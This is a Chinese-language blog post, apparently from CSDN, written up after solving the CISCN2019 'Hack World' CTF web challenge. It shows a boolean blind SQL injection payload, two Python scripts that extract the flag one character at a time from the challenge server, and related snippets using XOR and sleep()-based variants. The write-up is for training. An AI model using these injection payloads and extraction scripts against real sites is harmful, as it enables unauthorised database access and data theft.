hack world

最新推荐文章于 2023-04-13 23:24:59 发布
最新推荐文章于 2023-04-13 23:24:59 发布
阅读量266 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beihai2013/article/details/112917568
版权

来源:[CISCN2019 华北赛区 Day2 Web1]

链接:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World

参考:https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/#CISCN2019-Hack-world

考察:bool盲注

看到payload想骂脏话

尝试常规输入,1和2可以,之后都不行

尝试常规的注入,只有单引号时会返回bool(false),应该提示bool型盲注吧

payload为

if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)

由于1和2输出不同,根据这个进行注入即可

可以通过一个字典,观察哪些字符被waf过滤

脚本

import requests

url="http://a9e8a73f-f3d4-4ee4-a165-78c21730f40d.node3.buuoj.cn/index.php"

text1 = "Hello, glzjin wants a girlfriend."
text2 = "Do you want to be my girlfriend?"
ans = ""
for i in range(60):
	# print("debug")
	flag = False
	for j in range(0,256):
		c = chr(j)
		# print(c)
		s = "if(ascii(substr((select(flag)from(flag)),{},1))={},1,2)".format(i+1, j) #注意此处必须转成ascii码判断,因为sql中不区分大小写,直接判断字符会有双引号单引号大小写等问题
		post_data = {
			"id": s
		}
		# print(s)
		response = requests.post(url, post_data)
		if text1 in response.text:
			flag = True
			ans += c
			print(c)
			break
	if flag == False:
		break
print(ans)

# if(substr(select(flag)from(flag),{},1)={},1,2)

这个脚本比较慢,提高效率的方法有两个。一个是转换成ascii码查找(本题过滤了ord,因此只能用ascii进行转码),一个是range下限设置为32('a’从32开始)

wp提供了一个二分脚本

import requests

url = 'http://a9475c38-821c-4b23-aa96-87730f0863fe.node3.buuoj.cn/index.php'
flag = 'Hello, glzjin wants a girlfriend.'
result = ''

for i in range(1, 50):
    sleep(1)
    high = 127
    low = 32
    mid = (high + low) // 2
    while high > low:
        payload = "if(ascii(substr((select(flag)from(flag)),{index},1))>{char},1,2)".format(index=i, char=mid)
        data = {'id': payload}
        response = requests.post(url=url, data=data)
        if flag in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (high + low) // 2

    result += chr(mid)
    print(result)
beihai2013
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ECharts使用的世界地图world.js
04-29
Echarts使用地图类型的组件时用到的js文件, 引入该文件可以使用ECharts Map,世界地图world.js
[CISCN2019]Hack World
m0_46587008的博客
11-29 974
一、Hack World 打开环境:显示“所有你想知道的都在flag表中的flag行中”。所以基本确定是sql注入 二、初探 这个时候我们确定是sql注入,开始对它进行一个初步的测试,判断采取哪种注入方式。 先输入1: 回显。 输入0: 回显不一致。 随后开始尝试报错使用 1’: 返回bool(false),没有报错信息(报错注入不可能了,第一想法是联合注入或盲注) 尝试闭合 1’–+ 或 1’#: 发现有检测,于是Fuzzing测试一下过滤了多少关键词: 发现大部分关键词都不能用,之前想法是盲注和联合
盲注实战题——Hack World
Marsper的博客
09-26 549
Hack World——布尔盲注 题面如下图 首先在搜索框中输入0,1或2测试显示结果 输入0时的显示结果 输入1时显示如下 输入2时的显示结果如下 继续测试得知输入1和2以外的数字显示结果和0的结果一样 继续测试,输入数字以外的英文测试,显示结果如下 结果发现都显示bool(false)错误 所以判断此题为数字型的bool盲注。 根据上篇介绍过的知识,所以用sql注入语句继续进行测试 输入 if(ascii(substr((select(flag)from(flag)),1,1))=102,1,
[CISCN2019 华北赛区 Day2 Web1]Hack World
wuuconix's blog
04-02 4256
[CISCN2019 华北赛区 Day2 Web1]Hack World 这道题的考点貌似是sql盲注还是第一次遇到这种类型,表示太难了。。 主界面 它的意思是让我们给出文章的id,那我们就输入一试试。 有回显,出题人想要一个girlfriend。对此,我只想说,想peach。然后我们再输入2试试。 对这个回显,我怀疑出题人妄想症犯了。之后我们再输入3试试。 发生了错误,我们再输入万能密码试试。 好吧,它检测到sql注入了,以我目前的知识,我已经手足无措了,在网上查阅资
(未完成版)Hack World
m0_75178803的博客
04-13 78
Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试;输入字符时的boo提示,那这里就得考虑布尔注入。在cmd界面安装requests库的前提下。用python执行脚本得到flag。
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1024
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
counter hack reloaded
09-11
My purpose here is not to create an army of barbarian hackers mercilessly bent on world domination. The focus of this book is on defense, but to create an effective defense, we must understand the ...
hitchhiker:清理了《魔兽世界》 3.3.5a版《 The Hitchhiker's Hack》的源代码-Source code world
03-25
本资源"《The Hitchhiker's Hack》"是基于《魔兽世界》3.3.5a版本的一个源代码清理项目,由用户"hitchhiker"进行整理。这一开源项目的意义在于为开发者提供了一个更加清晰、易读的代码库,有助于他们理解和研究...
hello-world:我的第一个GitHub Pages存储库
03-26
在IT行业中,GitHub Pages是一个非常重要的工具,尤其对于开发者来说,它是展示个人作品、文档分享以及项目托管...同时,"Hack"标签也鼓励我们期待一些独特的实现或技巧,使这个项目超越了基本的"Hello, World!"示例。
BSD.Hack.B00V3DWD80
03-27
Title: BSD Hack Author: Ajay Kumar Tiwari Length: 410 pages Edition: 1 Language: English Publication Date: 2015-03-22 ISBN-10: B00V3DWD80 In the world of Unix operating systems, the various BSDs come...
2021-8-10ctf的Hack World 1(sql异或布尔盲注入,fuzz测试waf词语方法,通常做ctfsql题目的思路)
qq_45290991的博客
08-10 682
今天这道题算是一个总结吧,其实不难,就是很多细节没有办法想到所以导致出了很多问题。最近也一些关于ctf的sql注入的简单题目,我总结了一下经验,主要从审题、确定注入类型(难点),构造绕过waf的payload几个方面进行讲解。 一、审题 这道题我审题就没做好,为何这么说呢? 首先,题目的意思是在flag表中查询flag列即可: 但是用脚指头想都知道不可能这么简单呀!这是一个post数据的网页,然后就按照常规思路来吧: 我输入1,2,返回了正常的问候“找女友屌丝系列”: 接着我就用了常
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
feng的博客
10-24 1109
前言 这道题考察的就是SQL注入,其中过滤了一些关键词,自己没做出来的主要原因是对于注入类型的判断还有注入的姿势仍然不够熟练,并不是题目很难。 WP 进入环境后首先我们发现这是一个Post传id的注入,我们要进行注入的表和列都已经给我们了。经过尝试,发现输入1和2的时候存在有意义内容的回显。 再经过一系列的尝试,发现过滤了很多东西,空格也被过滤了。这时候我在判断注入类型那里出现了问题。我以为是字符型注入。 其实我们输入注入id=2/2,会发现回显的是id=1的内容,因此判断为数字型注入。 接下来就是如何注入
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43345082的博客
08-10 4130
一个盲注过滤了很多东西 最后发现这样可以正常回显 id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),sleep(3),1)) 写脚本一位位爆破,二分法找 但是因为平台的问题可能跑到一半会被限制,可以加sleep()时间或者从从下一位继续跑 #!/usr/bin/python #-*-coding:utf-8 -*- import ...
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1729
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
BUUCTF——Hack World
weixin_45864041的博客
12-03 1263
题目告诉我们表名为flag,列名为flag 所以值查询为select flag from flag 按照提示传入id=0 传入id=1 什么都不传 现在看来应该是布尔型盲注,而且过滤了一些东西 尝试传入1^1 传入1^0 直接构造payload 1^(ascii(substr((select flag from flag),0,1))=102) 传入后可以发现,空格被过滤了 所以换一下 1^(ascii(substr((select(flag)from(flag)),0,1))=102) .
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
风过江南乱的博客
06-28 2602
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
HACK Assembly
最新发布
04-28
HACK Assembly是一种汇编语言,用于编写计算机程序。它是为了与nand2tetris项目中的HACK计算机体系结构相匹配而设计的。HACK Assembly语言可以直接转换成HACK机器语言,并可以在HACK计算机上运行。HACK Assembly包括一组指令,每个指令都代表一个特定的操作,如加载数据、存储数据、算术运算和逻辑运算等。在使用HACK Assembly编程时,需要了解计算机硬件系统的基本概念和操作方法,例如内存地址、寄存器、指令寻址等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值